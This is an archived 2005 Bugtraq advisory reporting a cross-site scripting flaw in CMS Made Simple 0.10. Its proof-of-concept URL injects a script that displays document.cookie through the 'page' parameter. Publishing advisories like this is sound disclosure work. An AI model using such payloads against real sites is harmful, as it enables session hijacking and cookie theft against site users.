CMS Made Simple 0.10 is susceptible to a cross site scripting attack.
X1ngBox_at_securityfocus.com
Date: 09/26/05
- Previous message: angelo_at_rosiello.org: "FreeBSD GNU Mailutils 0.6 imap4d exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 26 Sep 2005 08:38:05 -0000 To: bugtraq@securityfocus.com('binary' encoding is not supported, stored as-is) [Description]: CMS lets you update your pages and keep the content on a static page that will
not become stale regardless of how much other content gets placed on your site
[version]:CMS Made Simple 0.10
[vendor]:http://www.cmsmadesimple.org
[Vulnerability]: cross site script
[exploit]:
http://[host]/[cms]/index.php?page=<script>alert(document.cookie);</script>
.......[X1NG]..........
X1ngBox <at/> Gmail Com
- Previous message: angelo_at_rosiello.org: "FreeBSD GNU Mailutils 0.6 imap4d exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|